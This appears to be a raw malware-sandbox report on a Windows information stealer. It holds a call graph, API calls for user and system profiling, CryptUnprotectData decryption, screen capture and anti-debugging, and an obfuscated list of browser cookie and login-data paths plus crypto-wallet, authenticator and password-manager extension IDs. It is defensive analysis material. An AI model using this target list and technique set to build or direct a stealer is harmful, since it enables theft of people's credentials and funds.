73609->73576 73610->73596 73611->73597 73612->73606 73615 402ff9 73613->73615 73614 4033ee 73614->73497 73615->73614 73617 402fcc 6 API calls 73615->73617 73619 401ff9 6 API calls 73615->73619 73620 403349 73615->73620 73622 402476 6 API calls 73615->73622 73616 402fcc 6 API calls 73616->73620 73617->73615 73618 40112c 6 API calls 73618->73620 73619->73615 73620->73615 73620->73616 73620->73618 73726 40112c 8 API calls __aullrem 73620->73726 73622->73615 73624 40200e 73623->73624 73625 401c1e 6 API calls 73624->73625 73626 402426 ExitProcess 73624->73626 73627 402083 73624->73627 73628 402fcc 6 API calls 73624->73628 73630 402221 73624->73630 73727 401c1e 73624->73727 73625->73624 73627->73624 73631 40112c 6 API calls 73627->73631 73628->73624 73630->73497 73631->73627 73632 4020ce Sleep 73633 401c1e 6 API calls 73632->73633 73633->73624 73635 402482 73634->73635 73636 402be1 GetUserNameW 73635->73636 73637 402af0 GetComputerNameW 73635->73637 73638 401ff9 6 API calls 73635->73638 73641 402b69 73635->73641 73642 402555 73635->73642 73643 402fcc 6 API calls 73635->73643 73644 401c1e 6 API calls 73635->73644 73646 402476 6 API calls 73635->73646 73636->73635 73637->73635 73638->73635 73639 402476 6 API calls 73639->73642 73640 401ff9 6 API calls 73640->73642 73641->73497 73641->73641 73642->73635 73642->73639 73642->73640 73645 40112c 6 API calls 73642->73645 73643->73635 73644->73635 73645->73642 73646->73635 73656 43023b _unexpected 73647->73656 73648 4309a8 73648->73497 73649 430228 206 API calls 73649->73656 73650 42f625 206 API calls 73650->73656 73651 42f278 206 API calls 73651->73656 73652 42fd35 206 API calls 73652->73656 73653 447e24 ___std_exception_copy 15 API calls 73653->73656 73654 438e28 3 API calls 73654->73656 73655 40b81c 43 API calls 73655->73656 73656->73648 73656->73649 73656->73650 73656->73651 73656->73652 73656->73653 73656->73654 73656->73655 73657 447a80 ___std_exception_destroy 14 API calls 73656->73657 73658 41f9a4 58 API calls 73656->73658 73659 40b7bb 43 API calls 73656->73659 73657->73656 73658->73656 73659->73656 73673 436af4 __fread_nolock _unexpected _strlen 73660->73673 73661 438e28 3 API calls 73667 438a76 GetPhysicallyInstalledSystemMemory 73661->73667 73662 438019 73662->73497 73663 438b8c EnumDisplayDevicesA 73663->73673 73664 438e28 LoadLibraryW GetPEB lstrcmpiW 73664->73673 73665 437265 KiUserCallbackDispatcher 73665->73673 73666 419e6b 127 API calls 73666->73673 73667->73673 73669 434fac 15 API calls 73669->73673 73670 436adc 176 API calls 73670->73673 73671 44568a 29 API calls 73671->73673 73672 434040 46 API calls 73672->73673 73673->73661 73673->73662 73673->73663 73673->73664 73673->73665 73673->73666 73673->73669 73673->73670 73673->73671 73673->73672 73674 41f9a4 58 API calls 73673->73674 73734 41d057 73673->73734 73740 44be84 43 API calls __wfreopen_s 73673->73740 73741 4360e1 73673->73741 73674->73673 73692 434090 _unexpected _wctomb_s _strlen 73677->73692 73678 434f14 RegCloseKey 73678->73692 73679 434be9 RegQueryValueExW 73679->73692 73680 4349e7 73680->73497 73681 434f73 RegCloseKey 73681->73692 73682 434d8e RegOpenKeyExW 73682->73692 73683 434ce5 wsprintfW 73683->73692 73684 4346ce wsprintfW 73684->73692 73685 434706 RegEnumKeyExW 73685->73692 73686 434758 RegCloseKey 73686->73692 73687 434954 RegOpenKeyExW 73687->73692 73688 434080 127 API calls 73688->73692 73689 447a80 14 API calls ___std_exception_destroy 73689->73692 73691 419e6b 127 API calls 73691->73692 73692->73678 73692->73679 73692->73680 73692->73681 73692->73682 73692->73683 73692->73684 73692->73685 73692->73686 73692->73687 73692->73688 73692->73689 73692->73691 73746 419496 106 API calls 3 library calls 73692->73746 73701 433c23 73693->73701 73694 419e6b 127 API calls 73694->73701 73695 433d34 73697 4338b5 198 API calls 73697->73701 73699 434022 GetProcessHeap RtlFreeHeap 73699->73497 73700 43323b 198 API calls 73700->73701 73701->73694 73701->73695 73701->73697 73701->73699 73701->73700 73747 430e6c 73701->73747 73768 43350d 200 API calls 73701->73768 73769 432718 73701->73769 73704 421f01 73703->73704 73705 4220b5 GetPEB 73704->73705 73706 4279e0 GetPEB 73704->73706 73707 421f6c NtQueryInformationProcess 73704->73707 73708 42215d 73704->73708 73705->73704 73706->73704 73707->73704 73708->73497 73710 4224b4 73709->73710 73711 4227be NtQueryInformationProcess 73710->73711 73712 422795 GetPEB 73710->73712 73713 4279e0 GetPEB 73710->73713 73714 422802 73710->73714 73711->73710 73712->73710 73713->73710 73714->73497 73716 42cfd0 73715->73716 73717 42d5bb 73716->73717 73718 42b9c5 223 API calls 73716->73718 73720 419b9d 72 API calls 73716->73720 73721 42cfba 223 API calls 73716->73721 73722 42b9ae 206 API calls 73716->73722 73724 42c0da 223 API calls 73716->73724 73725 41a28f 182 API calls 73716->73725 73818 42ca0d 73716->73818 73833 42ad82 73716->73833 73717->73497 73718->73716 73720->73716 73721->73716 73722->73716 73724->73716 73725->73716 73726->73615 73731 401c31 73727->73731 73728 401ebc GetSystemTimeAsFileTime 73728->73731 73729 401ff9 7 API calls 73729->73731 73730 401c1e 7 API calls 73730->73731 73731->73728 73731->73729 73731->73730 73732 401f62 __aulldiv 73731->73732 73733 402fcc 7 API calls 73731->73733 73732->73632 73733->73731 73735 447e24 ___std_exception_copy 15 API calls 73734->73735 73736 41d065 73735->73736 73737 438e28 3 API calls 73736->73737 73738 41d079 GetCurrentHwProfileA 73737->73738 73739 41d083 73738->73739 73739->73673 73740->73673 73745 436133 73741->73745 73742 4360e1 15 API calls 73742->73745 73743 43669e 73743->73673 73743->73743 73744 447e24 ___std_exception_copy 15 API calls 73744->73745 73745->73742 73745->73743 73745->73744 73746->73692 73767 430e85 73747->73767 73748 4321e3 GetDIBits ReleaseDC 73748->73767 73749 4338b5 186 API calls 73749->73767 73750 4325bf GetProcessHeap 73750->73767 73751 432097 GetProcessHeap 73751->73767 73752 431d2b RtlAllocateHeap 73752->73767 73753 431e4c GetObjectW 73753->73767 73754 431c69 GetDC 73754->73767 73755 4314b2 GetProcessHeap 73755->73767 73756 4314e4 HeapAlloc 73756->73767 73757 430e6c 186 API calls 73757->73767 73758 43323b 186 API calls 73758->73767 73759 4326e0 GetProcessHeap RtlFreeHeap GetProcessHeap HeapFree 73759->73701 73760 431902 73761 430f3a RtlAllocateHeap 73761->73767 73762 432b1b 186 API calls 73762->73767 73763 4228cf 58 API calls 73763->73767 73764 432718 186 API calls 73764->73767 73765 433c10 186 API calls 73765->73767 73766 43350d 186 API calls 73766->73767 73767->73748 73767->73749 73767->73750 73767->73751 73767->73752 73767->73753 73767->73754 73767->73755 73767->73756 73767->73757 73767->73758 73767->73759 73767->73760 73767->73761 73767->73762 73767->73763 73767->73764 73767->73765 73767->73766 73768->73701 73781 43272e 73769->73781 73770 432a76 CreateCompatibleBitmap 73770->73781 73771 432a26 BitBlt 73771->73781 73772 432a0e SelectObject 73772->73781 73773 432a5b SelectObject 73773->73781 73774 432893 CreateCompatibleDC 73774->73781 73775 432943 73776 432afb DeleteDC DeleteObject 73776->73701 73777 430e6c 193 API calls 73777->73781 73779 4338b5 193 API calls 73779->73781 73781->73770 73781->73771 73781->73772 73781->73773 73781->73774 73781->73775 73781->73776 73781->73777 73781->73779 73782 432718 193 API calls 73781->73782 73783 432b1b 73781->73783 73795 43350d 200 API calls 73781->73795 73782->73781 73792 432b24 73783->73792 73784 4338b5 197 API calls 73784->73792 73785 433c10 197 API calls 73785->73792 73786 43302c GetDesktopWindow GetDC 73786->73792 73787 432eb3 SystemParametersInfoW 73787->73792 73788 432fe8 73788->73781 73789 432b1b 197 API calls 73789->73792 73790 43350d 197 API calls 73790->73792 73791 430e6c 197 API calls 73791->73792 73792->73784 73792->73785 73792->73786 73792->73787 73792->73788 73792->73789 73792->73790 73792->73791 73793 432718 197 API calls 73792->73793 73796 43323b 73792->73796 73793->73792 73795->73781 73797 433253 73796->73797 73798 433448 73797->73798 73799 43341c GetSystemMetrics 73797->73799 73800 4333c1 GetSystemMetrics 73797->73800 73801 43327e CreateDCW 73797->73801 73802 432718 196 API calls 73797->73802 73803 4334f3 DeleteDC 73797->73803 73804 43350d 196 API calls 73797->73804 73806 4338b5 73797->73806 73799->73797 73800->73797 73801->73797 73802->73797 73803->73792 73804->73797 73812 4338cd 73806->73812 73807 432b1b 199 API calls 73807->73812 73808 43323b 199 API calls 73808->73812 73809 432718 199 API calls 73809->73812 73810 4338b5 199 API calls 73810->73812 73811 433c10 199 API calls 73811->73812 73812->73807 73812->73808 73812->73809 73812->73810 73812->73811 73813 433be8 73812->73813 73814 4339bb 73812->73814 73815 430e6c 199 API calls 73812->73815 73816 430e6c 199 API calls 73813->73816 73814->73814 73815->73812 73817 433bfc DeleteObject 73816->73817 73817->73797 73826 42ca20 73818->73826 73819 42ca0d 223 API calls 73819->73826 73820 40e14e 161 API calls 73820->73826 73821 42ad82 223 API calls 73821->73826 73822 42cb4e 73824 42cfa7 73828 447a80 ___std_exception_destroy 14 API calls 73824->73828 73825 447e24 ___std_exception_copy 15 API calls 73825->73826 73826->73819 73826->73820 73826->73821 73826->73822 73826->73824 73826->73825 73827 42cfba 223 API calls 73826->73827 73829 438e28 3 API calls 73826->73829 73830 40b7bb 43 API calls 73826->73830 73850 42b9ae 73826->73850 73853 42b9c5 73826->73853 73827->73826 73832 42cfb2 73828->73832 73829->73826 73830->73826 73832->73716 73849 42ad95 73833->73849 73834 42b7f1 73835 42b9c5 223 API calls 73835->73849 73836 447e24 15 API calls ___std_exception_copy 73836->73849 73837 42b99e 73842 447a80 ___std_exception_destroy 14 API calls 73837->73842 73838 447a80 ___std_exception_destroy 14 API calls 73838->73849 73840 42b9ae 206 API calls 73840->73849 73841 42cfba 223 API calls 73841->73849 73846 42b9a6 73842->73846 73843 42ad82 223 API calls 73843->73849 73844 438e28 LoadLibraryW GetPEB lstrcmpiW 73844->73849 73845 40b7bb 43 API calls 73845->73849 73846->73716 73847 42ca0d 223 API calls 73847->73849 73848 40e14e 161 API calls 73848->73849 73849->73834 73849->73835 73849->73836 73849->73837 73849->73838 73849->73840 73849->73841 73849->73843 73849->73844 73849->73845 73849->73847 73849->73848 73867 42c0da 73849->73867 73851 430228 206 API calls 73850->73851 73852 42b9c1 73851->73852 73852->73826 73866 42b9d5 73853->73866 73854 42c04f 73855 42ad82 223 API calls 73855->73866 73856 42ca0d 223 API calls 73856->73866 73857 42b9c5 223 API calls 73857->73866 73858 447e24 ___std_exception_copy 15 API calls 73858->73866 73859 438e28 3 API calls 73859->73866 73860 42c0ca 73862 447a80 ___std_exception_destroy 14 API calls 73860->73862 73861 42b9ae 206 API calls 73861->73866 73863 42c0d2 73862->73863 73863->73826 73864 40e14e 161 API calls 73864->73866 73865 40b7bb 43 API calls 73865->73866 73866->73854 73866->73855 73866->73856 73866->73857 73866->73858 73866->73859 73866->73860 73866->73861 73866->73864 73866->73865 73883 42c0ed 73867->73883 73868 42c878 73868->73868 73869 42c9fd 73874 447a80 ___std_exception_destroy 14 API calls 73869->73874 73870 42cfba 223 API calls 73870->73883 73871 42c0da 223 API calls 73871->73883 73872 40b7bb 43 API calls 73872->73883 73873 42ad82 223 API calls 73873->73883 73879 42ca05 73874->73879 73875 40e14e 161 API calls 73875->73883 73876 447a80 14 API calls ___std_exception_destroy 73876->73883 73877 42b9ae 206 API calls 73877->73883 73878 447e24 15 API calls ___std_exception_copy 73878->73883 73879->73849 73880 438e28 3 API calls 73880->73883 73881 42b9c5 223 API calls 73881->73883 73882 42ca0d 223 API calls 73882->73883 73883->73868 73883->73869 73883->73870 73883->73871 73883->73872 73883->73873 73883->73875 73883->73876 73883->73877 73883->73878 73883->73880 73883->73881 73883->73882 73885 443a37 73884->73885 73886 443a49 73884->73886 73911 4438d3 GetModuleHandleW 73885->73911 73896 443b8c 73886->73896 73889 443a3c 73889->73886 73912 443916 GetModuleHandleExW 73889->73912 73890 43ca83 73890->73471 73895 443a9b 73897 443b98 ___scrt_is_nonwritable_in_current_image 73896->73897 73918 44d13d EnterCriticalSection 73897->73918 73899 443ba2 73919 443aa1 73899->73919 73901 443baf 73923 443bcd 73901->73923 73904 4439ba 73928 443998 73904->73928 73907 4439d8 73909 443916 _unexpected 3 API calls 73907->73909 73908 4439c8 GetCurrentProcess TerminateProcess 73908->73907 73910 4439e0 ExitProcess 73909->73910 73911->73889 73913 443955 GetProcAddress 73912->73913 73914 443976 73912->73914 73913->73914 73917 443969 73913->73917 73915 443985 73914->73915 73916 44397c FreeLibrary 73914->73916 73915->73886 73916->73915 73917->73914 73918->73899 73921 443aad ___scrt_is_nonwritable_in_current_image 73919->73921 73920 443b14 _unexpected 73920->73901 73921->73920 73926 44446f 14 API calls 2 library calls 73921->73926 73927 44d154 LeaveCriticalSection 73923->73927 73925 443a80 73925->73890 73925->73904 73926->73920 73927->73925 73933 44fb15 GetPEB 73928->73933 73931 4439b4 73931->73907 73931->73908 73932 4439a2 GetPEB 73932->73931 73934 44399d 73933->73934 73935 44fb2f 73933->73935 73934->73931 73934->73932 73937 44ced5 73935->73937 73940 44cfe0 73937->73940 73941 44cef1 73940->73941 73942 44d00e 73940->73942 73941->73934 73942->73941 73947 44cf15 73942->73947 73945 44d028 GetProcAddress 73945->73941 73946 44d038 __dosmaperr 73945->73946 73946->73941 73950 44cf26 ___vcrt_InitializeCriticalSectionEx 73947->73950 73948 44cfbc 73948->73941 73948->73945 73949 44cf44 LoadLibraryExW 73951 44cfc3 73949->73951 73952 44cf5f GetLastError 73949->73952 73950->73948 73950->73949 73954 44cf92 LoadLibraryExW 73950->73954 73951->73948 73953 44cfd5 FreeLibrary 73951->73953 73952->73950 73953->73948 73954->73950 73954->73951 73955 a38586 73956 a38589 73955->73956 73959 a38f7e 73956->73959 73960 a38f8d 73959->73960 73963 a3971e 73960->73963 73968 a39739 73963->73968 73964 a39742 CreateToolhelp32Snapshot 73965 a3975e Module32First 73964->73965 73964->73968 73966 a3976d 73965->73966 73969 a38f7d 73965->73969 73970 a393dd 73966->73970 73968->73964 73968->73965 73971 a39408 73970->73971 73972 a39451 73971->73972 73973 a39419 VirtualAlloc 73971->73973 73972->73972 73973->73972 73974 450330 73979 45033d __dosmaperr 73974->73979 73975 45037d 73982 4447a4 14 API calls __dosmaperr 73975->73982 73976 450368 RtlAllocateHeap 73977 45037b 73976->73977 73976->73979 73979->73975 73979->73976 73981 44e560 EnterCriticalSection LeaveCriticalSection __dosmaperr 73979->73981 73981->73979 73982->73977 73983 99003c 73984 990049 73983->73984 73998 990e0f SetErrorMode SetErrorMode 73984->73998 73989 990265 73990 9902ce VirtualProtect 73989->73990 73992 99030b 73990->73992 73991 990439 VirtualFree 73996 9904be 73991->73996 73997 9905f4 LoadLibraryA 73991->73997 73992->73991 73993 9904e3 LoadLibraryA 73993->73996 73995 9908c7 73996->73993 73996->73997 73997->73995 73999 990223 73998->73999 74000 990d90 73999->74000 74001 990dad 74000->74001 74002 990dbb GetPEB 74001->74002 74003 990238 VirtualAlloc 74001->74003 74002->74003 74003->73989 74004 426b04 74005 426b49 __fread_nolock 74004->74005 74006 426f39 74005->74006 74007 447e24 ___std_exception_copy 15 API calls 74005->74007 74008 447a80 ___std_exception_destroy 14 API calls 74006->74008 74007->74005 74009 426f52 74008->74009 74010 4052d9 74011 4052ee __fread_nolock 74010->74011 74012 405900 74011->74012 74013 447e24 15 API calls ___std_exception_copy 74011->74013 74014 438e28 3 API calls 74011->74014 74017 438e28 3 API calls 74011->74017 74018 40b129 43 API calls 74011->74018 74022 447a80 ___std_exception_destroy 14 API calls 74011->74022 74023 4035d1 45 API calls 74011->74023 74024 405aaa 74011->74024 74043 434fac 74011->74043 74013->74011 74014->74011 74019 405567 CryptUnprotectData 74017->74019 74018->74011 74020 447a80 ___std_exception_destroy 14 API calls 74019->74020 74020->74011 74022->74011 74023->74011 74038 405ac3 _unexpected 74024->74038 74025 406018 lstrcatW 74025->74038 74026 4060e6 74027 405ebc lstrcatW 74028 4360e1 15 API calls 74027->74028 74032 405ed0 lstrcatW lstrcatW 74028->74032 74029 405be7 lstrcatW 74029->74038 74031 405eed lstrcatW 74033 4360e1 15 API calls 74031->74033 74032->74038 74036 405eff lstrcatW lstrcatW 74033->74036 74034 405bb6 74039 4360e1 15 API calls 74034->74039 74035 403600 101 API calls 74035->74038 74036->74038 74038->74025 74038->74026 74038->74027 74038->74029 74038->74031 74038->74034 74038->74035 74049 4048e2 46 API calls 74038->74049 74050 404988 46 API calls 74038->74050 74040 4061ef 74039->74040 74041 40e14e 161 API calls 74040->74041 74042 406203 74041->74042 74042->74011 74044 434fc2 _strcat _strncpy _strlen 74043->74044 74045 447e24 ___std_exception_copy 15 API calls 74044->74045 74046 434fac 15 API calls 74044->74046 74047 435e8e 74044->74047 74048 4360e1 15 API calls 74044->74048 74045->74044 74046->74044 74047->74011 74047->74047 74048->74044 74049->74038 74050->74038 74051 4102de 74052 44814e 16 API calls 74051->74052 74053 4102f1 74052->74053
                                                            APIs
                                                            • lstrcatW.KERNEL32(?,?), ref: 00406AFC
                                                            • lstrcatW.KERNEL32(?,\Local Storage\leveldb), ref: 00406B06
                                                            • lstrcatW.KERNEL32(?,?,?), ref: 00408A66
                                                            • lstrcatW.KERNEL32(?,/BrowserDB), ref: 00408A70
                                                            Strings
                                                            • EeS, xrefs: 00406B7F
                                                            • Au576xedro, xrefs: 00407584
                                                            • ppbibelpc576xedjmhbdihakflkd576xedcoccbgbkpo, xrefs: 004082E5
                                                            • flpici576xedilemghbmfalica576xedjoolhkkenfel, xrefs: 004075E4
                                                            • Zi576xedlPay, xrefs: 0040746A
                                                            • Te576xedmple, xrefs: 00408068
                                                            • imloif576xedkgjagghnncjkhgg576xeddhalmcnfklk, xrefs: 00408216
                                                            • Pha576xedntom, xrefs: 0040822F
                                                            • bfn576xedaelmomeim576xedhlpmgjnjophhpkkoljpa, xrefs: 00408242
                                                            • /BrowserDB, xrefs: 00408A68
                                                            • fihka576xedkfobkmkjojpchpf576xedgcmhfjnmnfpi, xrefs: 00408856
                                                            • nlbm576xednnijcnlegkjjpcfjclm576xedcfggfefdm, xrefs: 004081D0
                                                            • Ja576xedxx Lib576xederty, xrefs: 0040881F
                                                            • Bi576xedtClip, xrefs: 00407FD4
                                                            • fhbohimaelboh576xedpjbbldcngcnapn576xeddodjp, xrefs: 00408128
                                                            • ijmp576xedgkjfkbfho576xedebgogflfebnmejmfbml, xrefs: 00407FE3
                                                            • Tro576xednLi576xednk, xrefs: 00407616
                                                            • EnK576xedrypt, xrefs: 00408897
                                                            • kpfop576xedkelmapcoipemfend576xedmdcghnegimn, xrefs: 00407EED
                                                            • jbd576xedaocneiiinmjbj576xedlgalhcelgbejmnid, xrefs: 00407D6E
                                                            • Cy576xedano, xrefs: 00407AE5
                                                            • Hy576xedcon Lite Cli576xedent, xrefs: 004080C7
                                                            • ibnejdfjmmk576xedpcnlpebklmnk576xedoeoihofec, xrefs: 00407625
                                                            • Pol576xedymesh, xrefs: 004075AC
                                                            • amkmj576xedjmmflddogmhpjloim576xedipbofnfjih, xrefs: 004073C2
                                                            • Ni576xedfty, xrefs: 0040816B
                                                            • ffn576xedbelfdoeiohenk576xedjibnmadjiehjhajb, xrefs: 00408152
                                                            • EQ576xedUAL, xrefs: 004076A5
                                                            • VL6T, xrefs: 0040891C
                                                            • dmkam576xedcknogkgcdfhhbddcghach576xedkejeap, xrefs: 004084B0
                                                            • Yo576xedroi, xrefs: 00408143
                                                            • aea576xedchknmefphepccio576xednboohckonoeemg, xrefs: 004074A1
                                                            • GAu576xedth Authe576xednticator, xrefs: 00407298
                                                            • Coi576xedn98, xrefs: 00407492
                                                            • kln576xedaejjgbibmhlephnh576xedpmaofohgkpgkd, xrefs: 00407479
                                                            • lodccj576xedjbdhfakaekdiahmedf576xedbieldgik, xrefs: 00407FBB
                                                            • One576xedKey, xrefs: 00407859
                                                            • mnfif576xedefkajgofkcjkemidiae576xedcocnkjeh, xrefs: 00407F93
                                                            • Ma576xedth, xrefs: 004083D3
                                                            • ookjlb576xedkiijinhpmnjffcofj576xedonbfbgaoc, xrefs: 00407F69
                                                            • gae576xeddmjdfmmahhbj576xedefcbgaolhhanlaolb, xrefs: 00406D00
                                                            • Log576xedin Da576xedta Fo576xedr Acc576xedount, xrefs: 00408667
                                                            • Ste576xedem Key576xedchain, xrefs: 0040827B
                                                            • Bit576xedApp, xrefs: 00408847
                                                            • nanj576xedmdknhkinifnkgdcggcfnhd576xedaammmj, xrefs: 00407D13
                                                            • bcopg576xedchhojmggmff576xedilplmbdicgaihlkp, xrefs: 004080DA
                                                            • nhnk576xedbkgjikgcigadomkph576xedalanndcapjk, xrefs: 004087BC
                                                            • aiifb576xednbfobpmeekiphe576xedeijimdpnlpgpp, xrefs: 0040725B
                                                            • His576xedtory, xrefs: 004083AF
                                                            • W576xedeb Da576xedta, xrefs: 00408697
                                                            • hcflp576xedincpppdclinealmandi576xedjcmnkbgn, xrefs: 0040804F
                                                            • By576xedone, xrefs: 004076ED
                                                            • cnma576xedmaachppnkjgnil576xeddpdmkaakejnhae, xrefs: 00407593
                                                            • ICO576xedNex, xrefs: 004075D4
                                                            • Ron576xedin Wall576xedet, xrefs: 004085CE
                                                            • EeS, xrefs: 00407043
                                                            • E576xedOS Authenti576xedcator, xrefs: 00406D19
                                                            • Te576xedzBox, xrefs: 00407F84
                                                            • hpg576xedlfhgfnhbgpjden576xedjgmdgoeiappafln, xrefs: 0040768A
                                                            • Netw576xedork\Cook576xedies, xrefs: 00408505
                                                            • Lo576xedgin Da576xedta, xrefs: 0040864F
                                                            • \Local Storage\leveldb, xrefs: 00406AFE
                                                            • VL6T, xrefs: 004076C1
                                                            • Me576xedtaMa576xedsk, xrefs: 00406E46, 004087D8
                                                            • Na576xedsh Ex576xedtension, xrefs: 0040809F
                                                            • infe576xedboajgfhgbjpjbeppbkg576xednabfdkdaf, xrefs: 00407868
                                                            • Ke576xedplr, xrefs: 004084A0
                                                            • UL6T, xrefs: 0040702D
                                                            • Aut576xedhenti576xedcator, xrefs: 004074BA
                                                            • oel576xedjdldpnmdbchonieli576xeddgobddffflal, xrefs: 00406D28
                                                            • Au576xedthy, xrefs: 00406CF1
                                                            • Hist576xedory, xrefs: 0040867F
                                                            • ejbalbako576xedplchlghecda576xedlmeeeajnimhm, xrefs: 00406E55
                                                            • ilgcn576xedhelpchnceeipipij576xedaljkblbcobl, xrefs: 004072A7
                                                            • kn576xedcchdigobgh576xedenbbaddojjnnaogfppfj, xrefs: 0040887E
                                                            • NeoL576xedine, xrefs: 00407CB2
                                                            • Gua576xedrda, xrefs: 00408423
                                                            • Le576xedaf, xrefs: 00407881
                                                            • dkded576xedlpgdmmkkfjabffeg576xedanieamfklkm, xrefs: 00407AF8
                                                            • Coinb576xedase, xrefs: 004083FB
                                                            • Liqu576xedality, xrefs: 00407EDD
                                                            • Uni576xedSat, xrefs: 004082D2
                                                            • kkpllko576xeddjeloidieedojogacfhp576xedaihoh, xrefs: 004088A7
                                                            • bhgho576xedamapcdpbohphigoo576xedoaddinpkbai, xrefs: 004074C9
                                                            • fnjhmkhhmkb576xedjkkabndcn576xednogagogbneec, xrefs: 004085DD
                                                            • Gu576xedild, xrefs: 004081EB
                                                            • cj576xedelfplplebdjjenllpjcbl576xedmjkfcffne, xrefs: 0040882E
                                                            • fhmfend576xedgdocmcbmfikdcog576xedofphimnkno, xrefs: 00408903
                                                            • Tr576xedezor Passw576xedord Manager, xrefs: 00408207
                                                            • cphhlg576xedmgameodnhkjdmkpa576xednlelnlohao, xrefs: 00407CC1
                                                            • KH576xedC, xrefs: 00408040
                                                            • ME576xedW CX, xrefs: 004073DD
                                                            • Wom576xedbat, xrefs: 004077AD
                                                            • onof576xedpnbbkehpmmoa576xedbgpcpmigafmmnjhl, xrefs: 004080AE
                                                            • Bin576xedance Cha576xedin Wal576xedlet, xrefs: 004085F6
                                                            • afbc576xedbjpbpfadlkmhm576xedclhkeeodmamcflc, xrefs: 004083E2
                                                            • hnfanknocfe576xedofbddgcijnm576xedhnfnkdnaad, xrefs: 0040840A
                                                            • Sol576xedlet, xrefs: 004088F4
                                                            • Te576xedrra Stat576xedion, xrefs: 0040724B
                                                            • nknhi576xedehlklippafakaeklbegl576xedecifhad, xrefs: 00408027
                                                            • nkd576xeddgncdjgjfcddamfg576xedcmfnlhccnimig, xrefs: 00407C99
                                                            • DAp576xedpPlay, xrefs: 00407FAC
                                                            • Cl576xedover, xrefs: 004087AC
                                                            • lkcjl576xednjfpbikmcm576xedbachjpdbijejflpcm, xrefs: 00408084
                                                            • Nab576xedox, xrefs: 00408018
                                                            • cihm576xedoadaighcej576xedopammfbmddcmdekcje, xrefs: 004086BB
                                                            • iW576xedlt, xrefs: 0040886F
                                                            • jojhf576xedeoedkpkglbfimdfabp576xeddfjaoolaf, xrefs: 004075BB
                                                            • nlgbh576xeddfgdhgbiamfdfmb576xedikcdghidoadd, xrefs: 00407D4F
                                                            • nkbihfbeo576xedgaeaoehlef576xednkodbefgpgknn, xrefs: 004087E8
                                                            • Sa576xedturn, xrefs: 00407C8A
                                                            • bln576xedieiiffboi576xedllknjnepogjhkgnoapac, xrefs: 00408804
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat
                                                            • String ID: /BrowserDB$Au576xedro$Au576xedthy$Aut576xedhenti576xedcator$Bi576xedtClip$Bin576xedance Cha576xedin Wal576xedlet$Bit576xedApp$By576xedone$Cl576xedover$Coi576xedn98$Coinb576xedase$Cy576xedano$DAp576xedpPlay$E576xedOS Authenti576xedcator$EQ576xedUAL$EnK576xedrypt$EeS$EeS$GAu576xedth Authe576xednticator$Gu576xedild$Gua576xedrda$His576xedtory$Hist576xedory$Hy576xedcon Lite Cli576xedent$ICO576xedNex$Ja576xedxx Lib576xederty$KH576xedC$Ke576xedplr$Le576xedaf$Liqu576xedality$Lo576xedgin Da576xedta$Log576xedin Da576xedta Fo576xedr Acc576xedount$ME576xedW CX$Ma576xedth$Me576xedtaMa576xedsk$Na576xedsh Ex576xedtension$Nab576xedox$NeoL576xedine$Netw576xedork\Cook576xedies$Ni576xedfty$One576xedKey$Pha576xedntom$Pol576xedymesh$Ron576xedin Wall576xedet$Sa576xedturn$Sol576xedlet$Ste576xedem Key576xedchain$Te576xedmple$Te576xedrra Stat576xedion$Te576xedzBox$Tr576xedezor Passw576xedord Manager$Tro576xednLi576xednk$UL6T$Uni576xedSat$VL6T$VL6T$W576xedeb Da576xedta$Wom576xedbat$Yo576xedroi$Zi576xedlPay$\Local Storage\leveldb$aea576xedchknmefphepccio576xednboohckonoeemg$afbc576xedbjpbpfadlkmhm576xedclhkeeodmamcflc$aiifb576xednbfobpmeekiphe576xedeijimdpnlpgpp$amkmj576xedjmmflddogmhpjloim576xedipbofnfjih$bcopg576xedchhojmggmff576xedilplmbdicgaihlkp$bfn576xedaelmomeim576xedhlpmgjnjophhpkkoljpa$bhgho576xedamapcdpbohphigoo576xedoaddinpkbai$bln576xedieiiffboi576xedllknjnepogjhkgnoapac$cihm576xedoadaighcej576xedopammfbmddcmdekcje$cj576xedelfplplebdjjenllpjcbl576xedmjkfcffne$cnma576xedmaachppnkjgnil576xeddpdmkaakejnhae$cphhlg576xedmgameodnhkjdmkpa576xednlelnlohao$dkded576xedlpgdmmkkfjabffeg576xedanieamfklkm$dmkam576xedcknogkgcdfhhbddcghach576xedkejeap$ejbalbako576xedplchlghecda576xedlmeeeajnimhm$ffn576xedbelfdoeiohenk576xedjibnmadjiehjhajb$fhbohimaelboh576xedpjbbldcngcnapn576xeddodjp$fhmfend576xedgdocmcbmfikdcog576xedofphimnkno$fihka576xedkfobkmkjojpchpf576xedgcmhfjnmnfpi$flpici576xedilemghbmfalica576xedjoolhkkenfel$fnjhmkhhmkb576xedjkkabndcn576xednogagogbneec$gae576xeddmjdfmmahhbj576xedefcbgaolhhanlaolb$hcflp576xedincpppdclinealmandi576xedjcmnkbgn$hnfanknocfe576xedofbddgcijnm576xedhnfnkdnaad$hpg576xedlfhgfnhbgpjden576xedjgmdgoeiappafln$iW576xedlt$ibnejdfjmmk576xedpcnlpebklmnk576xedoeoihofec$ijmp576xedgkjfkbfho576xedebgogflfebnmejmfbml$ilgcn576xedhelpchnceeipipij576xedaljkblbcobl$imloif576xedkgjagghnncjkhgg576xeddhalmcnfklk$infe576xedboajgfhgbjpjbeppbkg576xednabfdkdaf$jbd576xedaocneiiinmjbj576xedlgalhcelgbejmnid$jojhf576xedeoedkpkglbfimdfabp576xeddfjaoolaf$kkpllko576xeddjeloidieedojogacfhp576xedaihoh$kln576xedaejjgbibmhlephnh576xedpmaofohgkpgkd$kn576xedcchdigobgh576xedenbbaddojjnnaogfppfj$kpfop576xedkelmapcoipemfend576xedmdcghnegimn$lkcjl576xednjfpbikmcm576xedbachjpdbijejflpcm$lodccj576xedjbdhfakaekdiahmedf576xedbieldgik$mnfif576xedefkajgofkcjkemidiae576xedcocnkjeh$nanj576xedmdknhkinifnkgdcggcfnhd576xedaammmj$nhnk576xedbkgjikgcigadomkph576xedalanndcapjk$nkbihfbeo576xedgaeaoehlef576xednkodbefgpgknn$nkd576xeddgncdjgjfcddamfg576xedcmfnlhccnimig$nknhi576xedehlklippafakaeklbegl576xedecifhad$nlbm576xednnijcnlegkjjpcfjclm576xedcfggfefdm$nlgbh576xeddfgdhgbiamfdfmb576xedikcdghidoadd$oel576xedjdldpnmdbchonieli576xeddgobddffflal$onof576xedpnbb